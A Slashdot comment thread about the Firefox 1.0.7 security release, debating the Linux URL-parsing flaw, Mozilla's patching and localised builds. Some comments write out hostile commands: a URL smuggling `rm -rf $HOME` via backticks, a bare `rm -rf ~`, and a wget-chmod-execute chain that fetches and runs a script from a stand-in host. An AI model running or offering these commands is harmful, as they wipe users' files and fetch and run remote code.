Firefox 1.0.7 Released

hackajar writes "Firefox 1.0.7 has been released today. From the announcement "Fixes are included for the international domain name (IDN) link buffer overflow vulnerability and the Linux command line URL parsing flaw. There are also other security and stability changes, including a fix for a crash experienced when using certain Proxy Auto-Config scripts. In addition, some regressions introduced by previous 1.0.x security updates have been resolved.""

More stable

[buro9]

I've been running it for 3 minutes, and I must say... it's VERY stable. Probably more so than ever!

(please understand this is a joke)

Re:More stable

Hey fuckface, why are trying to compile Firefox. Let others with some actually skill do that for you.

Yeah, that'll encourage people to take open source seriously...

I guess you compile Opera as well? Oh, that's right, it's a proprietary Windows binary only.

Binary only, sure, but at least for Windows, Mac, Linux, FreeBSD, Solaris, OS/2, QNX and many more, for example mobile equipment.

Re:More stable

most versions won't even compile without segfaulting the compiler.

Assuming this isn't a troll, if this is happening, something is VERY, VERY WRONG with your computer.

Re:More stable

Assuming this isn't a troll, if this is happening, something is VERY, VERY WRONG with your computer.

I thought so too att first, but when I took the computer back to the store the owner ran some tests and told me that the computer was fine.

Re:More stable

[geekboy642]

Assuming this isn't a troll, if this is happening, something is VERY, VERY WRONG with your computer.

As in, you're using Gentoo on an overclocked AMD. Stop it.

Re:More stable

[Elixon]

I'll be happy if it will not crash five times a day with XUL applications and if I won't see ten times a day random error "out of memory" when parsing 30kB XUL files...

I'm patient. Some things are difficult to do. I know that. This is just my wish as a web/xul developer. :-)

Re:More stable

[wdr1]

Me too! I'm up to 4 and it hasn't cra

Full release notes...

[tcopeland]

...are here here.

Also, from the Mozillazine article, looks like Portable Firefox has been updated as well.

And I'm posting this with 1.0.7, good times...

Re:Full release notes...

I'm the Firefox fanboy in my company for sure, but I have a growing trust issue with Mozilla here. Firefox 1.0.7 was released this morning, and http://www.mozillazine.org/ said to expect the list of known security vulnerabilities at http://www.mozilla.org/projects/security/known-vul nerabilities.html#firefox1.0.7 would be updated soon. With every other previous minor release this page was swiftly updated with all the security bulletins. Since its been two months since the previous minor update, what is Mozilla not telling us? A quick check of the new build announcements at http://www.squarefree.com/burningedge/ shows a lot of security updates and a lot of regressions. So where are they?

Re:Full release notes...

[spoonyfork]

Anyone else having an issue running Flash 8 in the portable firefox 1.0.7?

Re:Full release notes...

[CritterNYC]

Working fine for me (I'm the developer). Be sure you've copied NPSWF32.dll from your local plugins directory to the Portable Firefox\plugins directory. Also, keep in mind, that it probably won't work on a PC with no Flash installed.

If you need further assistance, drop a note in the support topic:
http://forums.mozillazine.org/viewtopic.php?p=1757 821

Re:Full release notes...

[spoonyfork]

Flash 8 in Portable Firefox works for me now. I'm in a corporate environment behind a proxy to the public internet and where I cannot install software (hence using PFF). After copying the Flash 8 dll and connecting to Macromedia's Flash site I was prompted by PFF for proxy credentials like it always does. When PFF attempted to load the Flash plugin to display the Flash content my OS prompted me for proxy credentials which it has never done for Flash (at least in PFF 1.0.6/Flash 7) before. Uncomfortable with this prompt I cancelled it which caused the Flash content not to load which led me to believe the plugin didn't work. In my testing today I accepted the prompt and the Flash content loaded. Sorry for the confusion related to our "secure" environment.

Thanks for putting together PFF, your work is very appreciated here.

Re:Full release notes...

[CritterNYC]

Cool, glad it's working for you now.

Always nice to be appreciated. I just released Portable AbiWord. 2 more apps are about ready to release. And I have more in the pipe.

Some things, money can't buy ...

[URSpider]

Slashdot subscription: $10.00.

Getting to download the next version of Firefox before the site gets Slashdotted: priceless !

Re:Some things, money can't buy ...

[Captain+Splendid]

Actually it is funny (if a little old), and I probably would have wasted a +1 Funny on it if I'd had mod points today.

Who pissed in your cornflakes this morning?

Re:Some things, money can't buy ...

[n-baxley]

or just go to digg.com

Re:Some things, money can't buy ...

[TheUz]

Right, right. = )

Re:Some things, money can't buy ...

[MoogMan]

I've heard there's a Korean mirror that you can use if the main site goes down...

Re:Some things, money can't buy ...

[That's+Unpossible!]

Slashdot subscription: $0.00

Getting to download the next version of Firefox because mozilla.org can withstand a slashdotting: $0.00

Flaming a stupid use of an old joke: priceless!

Re:Some things, money can't buy ...

[jamstar7]

I haven't seen a mod point in ages.

Re:Some things, money can't buy ...

[Mancat]

North Korea said there is no mirror. Tomorrow, however, they will say they never said that.

Today

[Ctrl+Alt+De1337]

Today seems to be Mozilladot day. At least it beats having another Googledot day. Variety is nice.

Quick to the point

[timeToy]

That's perfectly fits with yesterday's news about Mozilla foundation being more reactive to security fixes than M$.

Re:Quick to the point

[rampant+mac]

"...fits with yesterday's news about Mozilla foundation being more reactive to security fixes than M$."

Which virus does this Mozilla release include?

/rimshot - I keed, I keed

Re:Quick to the point

[shmlco]

I believe the actual story was about how Firefox was less secure. The spin on the story was that they're more reactive.

BTW, the use of "spin" was deliberate. I've yet to see numbers for both sides that prove MF is more reactive than MS, even though it appears to be "common knowledge". IIRC, the last release (1.0.6) fixed bugs found in March.

Re:Quick to the point

[NanoGator]

"That's perfectly fits with yesterday's news about Mozilla foundation being more reactive to security fixes than M$."

Um, yeah, but it still majorly sucks that these vulnerabilities are still happening quite routiunely. Which, btw, fits perfectly with yesterday's news about Opera being released for free.

Re:Quick to the point

It doesn't address why their vulnerabilities are slowly getting more and more critical as time progresses, and more-numerous. The latest Firefox one from Secunia is marked "Extremely Critical" and affects... Unix/Linux systems only apparently. Kinda' an OSS double-whammy.

For all the huffing and puffing people do about Moz browsers... they sure don't seem to be getting any "safer" despite all the claims of how it being open source means more eyes are looking for holes, etc, etc... Nor does it explain why the vulnerabilities are there in the first place if open source truly is supposed to be a "superior way" of doing things.

Moz used to chastise MS for having any vulnerabilities in IE to begin with, and for their frequent patching. Now that Moz products have many vulnerabilities being discovered, Moz is patching them constantly and they've changed their tune to "but we patch them quickly!", conveniently ignoring the fact that they're on the same road as MS and IE, and that this same attitude was one they railed against MS for so long citing that it proved an "inferior way" of doing things.

Making a browser ain't so easy after all, is it guys?

Re:Quick to the point

[jayloden]

The "Extremely Critical" problem listed on Secunia is actually only a problem for a small percentage of users. (not to discount it, just pointing out that it's not for all users). In case anyone is interested, the problem is simply that the Firefox launching script that shipped with previous versions doesn't verify input. This means that it processes

http://local`rm -rf $HOME1`host

through the shell, which of course is bad. However, the key points here are
a) It only affects the Linux/Unix platform
b) It only affects the user Firefox runs as
c) It only works if you are calling Firefox from an external application (i.e. clicking a link in a webpage won't do it), and that application has to do no checking of the arguments.

For example, if I try to load the link above in KDE, the url is processed by KDE before it is passed on to the Firefox launch script, and gives me an error that the host does not exist rather than actually executing the command.

In regards to the rest of your comment, it's silly to think that any development process is free of bugs. The idea behind with Open Source is simply that more people looking at the code means more people finding bugs. This may or may not be true. The point is, Open Source advocates don't claim OSS is free of bugs or security holes, just that it's a better model to find and patch bugs because you have an army of people looking at the code. In theory, you'd expect even MORE bugs to be found in OSS, but also for them to be patched faster.

Vulnerabilities will still be found, and they will still exist - people make mistakes. You make assumptions and mistakes when you code, like assuming someone isn't going to pass in a link with `rm -rf $HOME` embedded in backticks. That will always happen, no matter what the software is, or who writes it, but what matters is how you can respond to it. I don't believe that either Microsoft or Mozilla is doing all that great in that sense. Mozilla may take a giant leap forward once binary patching is available for updates - we'll see. I'm not defending the Mozilla foundation or bashing Microsoft here, but I do take umbrage to the insinuation that finding bugs means Open Source is a bad development model.

Re:Quick to the point

[shaitand]

That's cool. The last ie update fixed bugs found 2 years ago.

Re:Quick to the point

It only works if you are calling Firefox from an external application (i.e. clicking a link in a webpage won't do it), and that application has to do no checking of the arguments.

In other words it affects the default setup on many Gnome-based distros, which is legitimately extremely critical.

I'm confused

Can someone please explain to me the difference between the firefox nightly downloads, Mozilla 1.8, Aviary 1.0.1 & the trunk versions?

Re:I'm confused

[savala]

Can someone please explain to me the difference between the firefox nightly downloads, Mozilla 1.8, Aviary 1.0.1 & the trunk versions?

Okay, at the heart of it all is the trunk. This is where active development goes on. And even though there is no longer a stand-alone product being developed as "Mozilla", the trunk is currently working its way up to Mozilla 1.9, numbering back incrementally all the way to 0.6 (at the time of Netscape 6).
From the trunk, every so often (less frequently in the last two years) branches are cut. These branches are the 1.x branches, and from them the stable releases are created. Currently we have the 1.7 branch as the long-lived stable-branch (MoFo is committed to keeping its builds from this branch updated with security fixes for a while yet, while not changing its functionality). Mozilla 1.7.11 and this release, Firefox 1.0.7, are made from this branch. Also expect upcoming Thunderbird 1.0.7 and Mozilla 1.7.12 releases.
The Aviary 1.0 branch is basically the same as the Mozilla 1.7 branch, but is referred to specifically when talking about Firefox and Thunderbird. (It's more a CVS branch tag than something you should know about.)
Then, only recently, the 1.8 branch was created. A number of must-fix bugs still present on this branch have been identified, and these are currently being worked on. Once that's all done, Firefox 1.5, Thunderbird 1.5 and SeaMonkey 1.0 (the successor to the Mozilla application suite) will be released from it.
Deer Park 1.5 Beta 1 and SeaMonkey 1.0 Alpha were releases from this newly formed 1.8 branch, to show what is being worked toward.

It's likely that version numbers of all products/projects will converge at 2.0 in 1-2 years - although this might come after Mozilla 1.7.11 or thereabouts, depending on the necessary functionality specified for Mozilla/Gecko 2.0 (so based on what the backend needs, not frontend functionality).
Of course, it's just as likely that this won't happen. I'd bet MoFo itself doesn't know yet. They're not all that good at planning ahead. :)

Re:I'm confused

[savala]

err...
s/although this might come after Mozilla 1.7.11 or thereabouts/although this might come after Mozilla 1.11 or thereabouts/.

Re:I'm confused

[MCZapf]

Is there a picture of all this somewhere, for us visually-oriented people? I remember a while ago there was simplpe drawing of the branches/release schedule a click or two away from the mozilla homepage.

Re:I'm confused

Obvious flamebait, but I'll respond nonetheless.
None of this is targetted toward consumers. These are just the internals, known only to developers, and confusing none but a handful of geeks on sites such as this.
End users are only ever exposed to "Firefox 1.0", "Firefox 1.5" e.a. (Not even the Deer Park betas - the publicity and marketing around those are carefully limited to only get up to the circle of powerusers who're competent enough to be useful testers.)

blah blah bugs blah blah security

[caino59]

ok, for the argument of firefox vs. ie....

which one has been around longer?

by that, which one SHOULD by reason of pure common sense have LESS problems.

right.

Re:blah blah bugs blah blah security

[cerelib]

Not to take either side on this I have to disagree with your the relavance of your argument. The web has changed drastically since IE was first made.

Re:blah blah bugs blah blah security

[RiotXIX]

You can't just fob it off with a blah blah yada yada...this is a serious issue, as Symantec pointed out in a report on Monday: http://software.silicon.com/security/0,39024655,39 152423,00.htm,

although soon afterwards the pres of Mozilla europe retorted: http://software.silicon.com/security/0,39024655,39 152480,00.htm.

I don't work for silicon.com, that's just what my google search lead me to...that said, this symantec things been in my RSS feeds a lot recently...

Re:blah blah bugs blah blah security

Ummm

the newer one will have less problems because it will have a smaller install base and attackers will have less experience exploiting it.

Re:blah blah bugs blah blah security

[HermanAB]

Ughh - you are confusing cause and effect. The attackers are a bloody nuisance, but they do not cause the security problems in the code.

Re:blah blah bugs blah blah security

nope, they don't cause them, only expose them.

and yes, they do exist, they alwasy exist with changing technology.

Re:blah blah bugs blah blah security

which one SHOULD, by reason of pure common sense, have LESS problems?

FEWER

You should buy a few commas, too.

Update

[mysqlrocks]

Great, I just downloaded FireFox the other day. Supposedly it has built-in updating capabilities. Does anybody know if this is just for patches or will it update to the new version automatically?

Re:Update

[Dehumanizer]

It has, but, at the moment, it doesn't work instantly. In other words, you'll probably be notified of a new version tomorrow, or the day after.

Supposedly, 1.5 will be better in this respect, as it can update itself using small patches.

Re:Update

[rincebrain]

Yeah, 1.5 has differential update support, but since it's in beta, who knows how much testing that code has gotten (for those who don't know, autoupdate is toggled off in beta and CVS releases).

Re:And yet.....

[Heliologue]

Of course. If they had both Automatic Update AND the normal download links active at once, it's just ASKING to have their servers smoked.

No translated version

[zdzichu]

And yet again, users of localised build were left in the cold.
Think about your grandpa, who doesn't know english. He can't use non-translated build and is left with vulnerable, older version.
Good work, Firefox developers!

Re:No translated version

[Pichu0102]

Well, they could wait and make localized builds for everyone, and leave all users vulnerable for a longer time, or release the English build first and leave a few extra users behind for a while. I'd say the best idea would be to release the English build first so at least a few users are protected while they make the other builds.

Re:No translated version

[gowen]

So you think holding up all releases to wait for the slowest is a more secure strategy that releasing each translation when its ready?

OK.

Were you born dumb, or did you work at it?

Re:No translated version

Were you born dumb, or did you work at it?

He was born that way. You just can't teach that kind of stupidity.

Re:No translated version

[Viper+Daimao]

Is he Korean? I think there's aKorean version

Re:No translated version

[slavemowgli]

FWIW, there's no updated version of the Mozilla Suite, either - anyone who's using that is, well, stuck. I know that the Mozilla people want everyone to use Firefox, but this kind of "we don't care" attitude is just as arrogant as Microsoft's.

I'm seriously thinking about switching to Opera, myself. It's faster, it uses less memory, it's more standards-compliant, and now it's free, too - I honestly don't know what's keeping me, outside of laziness, maybe.

I hope some of the Mozilla people (Asa etc.) read this and think about it. Do you hear me? This kind of attitude will not convince Seamonkey users to switch to Firefox, it will convince them to switch to something else entirely because you're making it clear that you don't give a shit about them! You have a big problem, and it will come back to bite you sooner or later, so you'd better start working on it - or at least acknowledge that it exists.

Re:No translated version

[alc6379]

Is he Korean? I think there's aKorean version

Yeah... That's the only way to explain it, being an old person and all...

Re:No translated version

You could have everybody treated just as fast. Having one part of users covered within a day means just that: one part of users are covered.

Re:No translated version

Why would my grandpa be using buggy beta-quality software to begin with? He likes gettings things done, not farting around with bugs and crashes and memory leaks.

My grandpa just likes to go. He uses Opera.

Re:No translated version

[Guppy06]

Just how much of Firefox is language-dependant to understand? The worst part is the menu bar, and if he's already familiar with the placement of the "File" menu, he likely has no problem.

After all, the bookmark names aren't going to change between different language versions of Mozilla.

Be thankful: my grandfather uses AOL.

Re:No translated version

I seriously don't understand why this is flamebait. It's very informative and insightful.

Does any post that contains an insult, however much deserved, instantly get flagged by some "flamebait" modbot somewhere?

Re:No translated version

If my grandpa doesn't know English, then you don't know my grandpa.

Re:No translated version

[Phisbut]

Well, they could wait and make localized builds for everyone, and leave all users vulnerable for a longer time, or release the English build first and leave a few extra users behind for a while.

The problem is with the variable length of "for a while". With an update that doesn't change a single printed line of text, why can't they just build all the localized versions at the same time?

Re:No translated version

I know that the Mozilla people want everyone to use Firefox, but this kind of "we don't care" attitude is just as arrogant as Microsoft's.
[snip]
I hope some of the Mozilla people (Asa etc.) read this and think about it. Do you hear me?

What part of "we don't care" don't you understand?

Re:No translated version

[nine-times]

What about the Seamonkey Project?

Re:No translated version

[qray]

They left my grandpa out in the cold, so to speak. He's dead. Are there browsers in Heaven?
--
havnob broxtu focton slafty

Re:No translated version

[zdzichu]

Those aren't "extra" users. Majority of world do not use have english as they primary language. I bet there are more non-english users.

Re:No translated version

[dveditz]

FWIW, there's no updated version of the Mozilla Suite, either - anyone who's using that is, well, stuck.

Of course we're updating the Suite as well. Here's the QA blog from a few days ago calling for testers http://weblogs.mozillazine.org/qa/archives/2005/09 /another_round_of_candidate_bui.html. Even with builds in-hand they can't all go up at once. Like it or not, getting the English Firefox builds up first helps the most people the fastest. The rest are following.

Re:No translated version

[cloudmaster]

I was just going to congratulate you on taking up the work of translating, but I don't see your email address or login name anywhere on mozilla.org. When are you going to start helping with the localization, so that builds in your native language will be available at the same time as English? Or are you just someone who likes to complain but doesn't want to do anything about it? Maybe you could ask for your money back...

Check out http://www.google.com/search?q=learn+english while you're waiting for someone else to work hard in order to get your grandpa something for free, since you're obviously too lazy to help.

Re:No translated version

[antiMStroll]

I personally don't care if Asa cares about me or not, the product does the talking and I just much prefer Mozilla to Firefox. The way it handles cookies, forms, etc. in an intuitive pull-down and searches in the main address bar are alone reason enough for me. If the plan is to halt updates I agree it's time to give Opera another look.

Re:No translated version

Maority of world are not connected to Internet, and majority of Internet users are not Firefox target.

Re:No translated version

[zdzichu]

If you looked harder you would find translations by me in GNOME, some media players, articles. But that's not the point.

(Almost) nothing changed in user-visible text between 1.0.6 and 1.0.7. So translation from previous version covers newest version, too.

The problem: mozilla uses very own translation framework instead something standard. Getting translated Firefox out the door takes much more work, including getting approval from mozedevs.

Translators weren't given any notice that they have to prepare new translation. They didn't know that they have to prepare releases. And this works takes time. Time, in which non-english users are exposed, because there is no their language version available to download.

And I've seen reports that changing language version could trash profile.

Re:No translated version

[ttldkns]

hehehe, subtle.

i wonder if thats what the GP was getting at :P

Re:No translated version

[yoyhed]

...about switching to Opera, myself. It's faster...

You're right about Opera being faster. IGN.com actually loaded in less than an hour!

Re:No translated version

[Fatalis]

What keeps you from fixing the problem yourself?

Re:No translated version

I'm seriously thinking about switching to Opera, myself. It's faster, it uses less memory, it's more standards-compliant, and now it's free, too - I honestly don't know what's keeping me, outside of laziness, maybe.

Uh huh. And how would you know all this if you haven't used it yet? Nice astroturf, marketdroid. Try again.

Re:No translated version

[cloudmaster]

I didn't say you'd never translated - just not Mozilla. ;)

Anyway, given the better described problem, I'll have to retract my original remark. Why in the heck does anything locale-related require significant developer approval? The language file, if largely unchanged, should have nothing to do with the binary. At most, there should just be a couple of strings to add, which shouldn't take much time at all. If they did localization right, there's no good reason that the language file couldn't be pushed out as an update as the new strings were translated, and just use English as a placeholder until that time (for lack of a better solution). You're right, the Mozilla folks suck in that regard. :)

I can see the part about changing locales screwing up profiles, though. Specifically, numerical values changing format could easily break stuff if they're stored internally as strings rather than numbers... If they were stupid about language handling, then it's reasonable to assume they were stupid about number storage in configurations. :)

Re:No translated version

[Zerbey]

My (dearly departed) Grandad would have taken one look at Firefox, scoffed at the idea of even using a computer, let alone using one, and gone back to his gardening (which is was really good at). This is why I miss him so much.

Re:No translated version

Don't forget to ask them to refund the money you paid for it ....

Re:No translated version

[garat]

First, the people that localize are volunteers - they have no obligation to continue their work at all... Also, with revisions come change; with change possibly comes more work for localizers. If a group or individual chooses to localize after a final release has been made then they skip the trouble of constantly updating nightlies. The theoretical grandpa that doesn't speak English will get his updated software after having a vulnerable version just like the English speaking users got an updated version after being vulnerable for a while; there's no need to be negative towards the localizers.

Re:No translated version

[DoctorMO]

My problem is not only that I can never get the latest version in en-gb (come on! what the foobar needs translating, just recompile it and release it! and stop being stingy)

There is also the fact that they refuse to fix the 'securty' hole they 'fixed' in 0.8, there is no form of secure user selected file information so in firefox I can't show an image the user has selected before they upload it. which is just silly, fine it can be abused but think of a solution, the whole 'We don't care' attitude got on my nerves. It seemed like they would just go in for the quickist and dirtest fix posible which dosn't bode well for security updates.

Re:And yet.....

[op12]

Download it now if you're impatient, or wait a day or two for it to appear in the browser updates, as usual.

Nasty bugs.

[LurkerXXX]

The unix/linux bad-link problem allowing malicious URLs to run shell scripts is a bit nasty. Maybe Symantec wasn't entirely blowing smoke the other day with their warnings about Firefox not really being that much more secure than IE. The patches come out faster, but there sure are some nasty bugs in there yet.

Re:Nasty bugs.

[stlhawkeye]

The unix/linux bad-link problem allowing malicious URLs to run shell scripts is a bit nasty.

HA! I don't have your insecure Linux problems. I run Windows!

Re:Nasty bugs.

haven't been to the slash dot troll haven in a long time.

Still the same, corporate trolls spreading fud.

You know that they really care about you because if there is a vulnerability they will surely tell you what it is.

Does your paycheck justify your crudy behavior?

slashdot is so lame, what a waste of time.

Glad I don't use this pathetic site anymore

Re:Nasty bugs.

[tsa]

Who modded this Troll? (S)he certainly has no sense of humour whatsoever. ROFLOL!

Re:Nasty bugs.

Scared me enough to pull it down now rather than wait a few days like I usually do.

And to think that I just got 1.0.6 working with XFree86 (I probably have one of the last video cards not supported by X.org yet).

Re:Nasty bugs.

[matth]

Are you running Firefox as root?!?!

Re:Nasty bugs.

[LurkerXXX]

No, but that doesn't matter a bit.

Anyone can reinstall an OS in an hour. What matters is people's DATA. You know, pictures, documents, etc, accumulated over years. Stuff all users should back up but most users don't. Those are all things that can be trashed when an exploit hits them even when they aren't running as root.

The OS being intact is real nice for your geek pride, but but all the data files being trashed is a real loss to normal people.

Re:Nasty bugs.

[Zathrus]

Are you running Firefox as root?!?!

`rm -rf ~`

Because, of course, you wouldn't have anything valuable stored in your home directory, would you?

Not to mention that root privledges are not required to do a lot of things... like, oh say:


wget ftp://somesite/malicious_script && chmod +x malicious_script && ./malicious_script


What does malicious script do? Anything it wants -- including downloading and running root kits (after figuring out exactly which ones you are vulnerable to), sending out massive spam attacks, installing a user-level trojan that allows for remote controlled DDoS, etc.

I'm really tired of people claiming that not running as root is a miracle cure. Yes, it prevents some really nasty trivial attacks, but it doesn't protect your most valuable data (e.g. -- yours) and it doesn't prevent a lot of attacks that are perfectly happy to run in non-privledged space.

Re:Nasty bugs.

[miffo.swe]

The problem isnt in Firefox itself but rather in the script used to launch firefox from other applications. It demands launching a command from another application under your control going through bash. You cant be subjected to this by browsing around on the net for example. It demands user intervention to function. While i admit its a flaw its in no way as critical as some purports it to be. A similar flaw in Internet Explorer gets a minor threat rating.

There really needs to be some standard for rating security holes.

I mean, if this is rated very critical what the heck do you call a remote exploit? Very,very,very critical or what? Secunia, rated 7/5?

There seems to be a FUD campaign against Firefox. Why the heck would Symantec care about Firefox when they havent once to my knowledge critiziced Internet Explorer even when it had a critical patch coming out pretty much every day.

Re:Nasty bugs.

LurkerXXX: "Anyone can reinstall an OS in an hour"

I can't. Let's see:

• Backup user directories. To do this, boot from CD (the OS is compromised, so do not run it anymore)
• make sure all bits of the compromised OS are gone
• Install OS from DVD
• Download and install all updates
• Make new user account(s)
• Reinstall user data

If I practiced this every day, I wouldn't have to download the necessary updates, or I would keep a working up-to-date copy of the OS.

If I had to do this every (other) day, I would back up user directories daily.

Even if both were true, I doubt I would be able to do this within an hour. Maybe I need a faster system?

Re:Nasty bugs.

[black+mariah]

but it doesn't protect your most valuable data (e.g. -- yours)

I hate to say things like this, but someone mod this guy up. If your /bin gets hosed, that is absolutely no problem. Anyone with a Knoppix CD can fix that in a heartbeat. But losing everything in /~ is another story. Geeks like to pretend that nothing useful exists in /~, which just shows you how out of touch with reality most of them are...

Re:Nasty bugs.

[hostyle]

I agree to some extent (that the most important data is in ~) but if you're not backing up that important data regularly why should I have any sympathy for you? If you are backing it up regularly then you don't have that much to lose in the event of it getting hosed, now do you?

Re:Nasty bugs.

[cortana]

"I'm really tired of people claiming that not running as root is a miracle cure. Yes, it prevents some really nasty trivial attacks, but it doesn't protect your most valuable data (e.g. -- yours)..."

You mean you don't use SELinux? ;)

Re:Nasty bugs.

Hey I just cut and pasted the following line:

wget ftp://somesite/malicious_script && chmod +x malicious_script && ./malicious_script

and nothing happened. So I thought maybe I'd do this:

sudo wget ftp://somesite/malicious_script && chmod +x malicious_script && ./malicious_script

but it still didn't do anything bad.

So this really isn't much of a proof of concept code.

Then again, I tried this:
rm -rf ~

and my porn collection disappeared. WTF? You might be onto something here. Where can I download IE for Ubuntu? I need to frickin switch like NOW.

Re:Nasty bugs.

[pyrrhonist]

Who modded this Troll? (S)he certainly has no sense of humour whatsoever. ROFLOL!

You don't really need the "S".

Now, I know what you're thinking. You're thinking I'm going reuse the tired meme of, "there are no women on Slashdot".

However, you'd be wrong...

It's actually because all the female moderators have a wonderful sense of humor.

They're also all worldly, erudite, perspicacious, compassionate, shockingly beautiful, and, "really have it together".

(+1, Insightful?)

Re:Nasty bugs.

[An+Onerous+Coward]

Given that Linux is a multi-user system, the inability to trash data belonging to other people is a not-inconsequential advantage. Even "normal" people often have spouses and children, who should each have their own account.

However, given that most people don't use more than a tiny fraction of their hard drives, it seems like Linux should come with some utility that periodically makes a read-only copy of users' home directories. I know such things exist (in my CS department, everyone has a ~/.snapshot directory that has weekly, daily, and hourly backups), but I haven't found the script that does it.

Quick and easy backup utilities would be a real selling point for potential Linux home users.

Re:Nasty bugs.

[14erCleaner]

There seems to be a FUD campaign against Firefox. Why the heck would Symantec care about Firefox when they havent once to my knowledge critiziced Internet Explorer even when it had a critical patch coming out pretty much every day.

Symantec sells security software that covers up Microsoft vulnerabilities.

If everybody stopped using IE and Outlook, half of their business might go away.

Re:Nasty bugs.

[Martz]

This can be done with a nice little rsync script or even using LVM2 snapshot capability. I agree with the grand parent poster about losing home user data, *at least* it couldn't be every single users data though.

Re:And yet.....

[joshdick]

The Firefox team waits for a few days to direct the auto-update feature to the latest version. It just has to do with managing server load. The article points out where you can get 1.0.7 now.

More stable-Marketing.

It's like saying it's "New and Improved".

Re:More stable-Marketing.

[CDMA_Demo]

As long as it doesn't randomly use 99% of my CPU under windows and doesn't crash with java under linux, I am happy.

Re:More stable-Marketing.

[eno2001]

If you think it was stable before, you ain't seen NOTHIN' yet! Now it's also barn and silo!!!

Premature announcement ?

[MerlynEmrys67]

I hit the check for updates button in the options...

I get Firefox was unable to find any updates for my 1.0.6 firefox installation.

Oh well - time to get P0wed

Re:Premature announcement ?

As its been said many times before, updates aren't sent out thru the updater until about a week after release.

Re:Premature announcement ?

[LGagnon]

You have to download straight from the website. Mozilla delays the automatic updates for a day or so to decrease the likelihood of a /. effect.

Re:Premature announcement ?

[m50d]

Manual updates are made available a while before automatic ones, I've heard this will be fixed with 1.1.

Re:Premature announcement ?

[owlstead]

Just after 1.1 gets fixed, since for now it is a bit crappy (yes, I know it is beta). I've experienced some hangups, sometimes the back key suddenly doesn't work. Plugins are hard to enable (flash) and hard to get rid off. Besides all that, it is questionable if the new features are enough for a +0.1 update.

So I'm glad that there is an additional +0.0.1 update, even if it is not yet updated automatically. Firefox is one of the nicest browsers out there, but there is still a bit of a way to go for a +0.1 release.

Re:Premature announcement ?

[jesser]

I hadn't heard that and I find it hard to believe. A lot of aspects of Firefox's update system will be better in Firefox 1.5, but I don't see why that would result in simultaneous releases to the web site and to automatic update.

Colour me confused...

[bad_outlook]

Ok, I'm a geek and all, but this week I just installed 1.5 Beta 1 - so is it now vuln to this, whereas 1.0.7 is not? I understand branches, tags and such, but after awhile this could really confuse joe_user. Is anyone trying out the new Opera since it's now free? I've only tried the Win version, but darnit, it's very nice. Tonight I'll try it on Unbuntu, after updating FF to 1.0.7 of course (I don't run dev software at home, else I"ll hear about it crashing from my wife! ;))

Re:Colour me confused...

[Dan+Ost]

Besides the missing ads at the top, I haven't noticed any differences between
Opera 8.5 and 8.02.

Re:Colour me confused...

[Winckle]

I very much doubt Joe Sixpack would be using a beta build of firefox

Re:Colour me confused...

[elcid73]

There are some slight changes

Re:Colour me confused...

[bad_outlook]

right, he'd be running 1.0.6 - but if he saw a report that 1.5 beta 1 was out, would he know where he stood on the upgrade path? I'm talking about an uncle of mine, btw ;) He runs FF 1.0.6 and Opera now, but I can't wait for the 'auto-update' of the 1.5 series, that'll do wonders for this, FF is less secure than IE since patches will just...occur! (as long as we can trust mozilla more than microsoft...)

Re:And yet.....

[iamjoltman]

They always release the update on their servers, and wait a couple days to release it via the arrows. The do it to reduce load on their servers

So wait...

[Pichu0102]

If Mozilla Firefox 1.0.7 was just released... Then what was Mozilla Firefox 1.5 Beta 1?

Re:So wait...

[SILIZIUMM]

You said it yourself, version 1.5 *Beta 1*

1.5 beta?

Anything new here?

An update problem...

[RUFFyamahaRYDER]

I'm just wondering if anyone has the same problem as I'm having... In Firefox I click TOOLS->OPTIONS->ADVANCED. Then I click on software updates and click "Check Now" but it doesn't see the new Firefox version... Anyone know what is going on with this?

For now I'll get it here...

Re:An update problem...

[Secrity]

That is not a problem, it is a feature that has already been explained in this article. Hint: try going to http://download.mozilla.org/?product=firefox-1.0.7 &os=win&lang=en-US

Re:An update problem...

[rmjohnso]

I'm sorry, but I wish people would stop asking this question. This question has been asked for the past few updates.

Updates like you are looking for are not available for the 1.0.x branch. Patches will be available for the 1.5.x branch. For now, you have to download the entire browser and upgrade that way.

Memory leak issue fixed?

[akulbe]

I've tried to hammer 1.0.7 and see if I could reproduce the same crashes that happened in 1.0.6 and this issue *seems* to be fixed. Also, upgraded to (ewww!) Flash Player 8. Seems to be an improvement as well. (I say this because the previous issue usually happened on sites with Flash)

no updates?

Um i just got firefox to check for updates and there are none. Are they not wanting to load up their servers like they did las time? I really want to try this new auto updating thingy.

localised builds

[kamikazejay]

The british latest is still 1.0.6.
I can't understand why bugfixes, which wont change any of the text shown to the user (other than perhaps the version number), cannot be released for all locals at the same time.

Re:localised builds

[I+confirm+I'm+not+a]

I can't understand why bugfixes, which wont change any of the text shown to the user (other than perhaps the version number), cannot be released for all locals at the same time.

The localised versions, even if it's an apparently near identical one like British-English, still needs to be built by the relevant localisation team. Though I suspect it could be automated somewhat to avoid this TERRIBLE waiting ;-)

/also still waiting on British 1.0.6...

Re:localised builds

[gordgekko]

Because you Brits insist on speaking English. When 1.0.7 is converted to English from American, you'll get your new localized version!

Re:localised builds

[Draknek]

I'm British, but I've never bothered getting the en_GB version.

What are the differences?

Why should anyone bother?

Re:localised builds

[dkh2]

Try looking for the 'English' version instead. Along that line ... they don't have a separate 'American' version.

Back in the day... John Clease was one of Jay Leno's guests during the Clinton/Lewinsky scandal. He described 3 differences between Americans and the British.
1) We (the British) speak English.
2) When we hold a world championship sporting event we invite teams from other countries.
3) When we meet our head of state we only go down on ONE knee.

Re:localised builds

[kamikazejay]

I have used both and haven't noticed much of a difference, or any at all for that matter. I muse say that I haven't really been looking and, well, I have my pride.

Re:localised builds

[Bananenrepublik]

Because you Brits insist on speaking English. When 1.0.7 is converted to English from American, you'll get your new localized version!

That would be localised then.

Re:localised builds

[Haeleth]

At a guess, the English version doesn't have all those nasty spelling mistakes like "Fonts & Colors (sic)" which the careless American maintainers still haven't got round to fixing.

It's possible that it also replaces outlandish words like "cookies" with more familiar terms like "biscuits".

Re:localised builds

[Phisbut]

When 1.0.7 is converted to English from American, you'll get your new localized version!

Other than the version number in the "About Firefox" window, what needs to be converted/translated in this bugfix? Really. Why should it take longer to release the localized versions?

Re:localised builds

[gordgekko]

You know what's embarassing? I'm a Canadian...and I used the American spelling of localised.

Re:localised builds

[szrachen]

cookies = crumpets DONE!

Re:localised builds

[black+mariah]

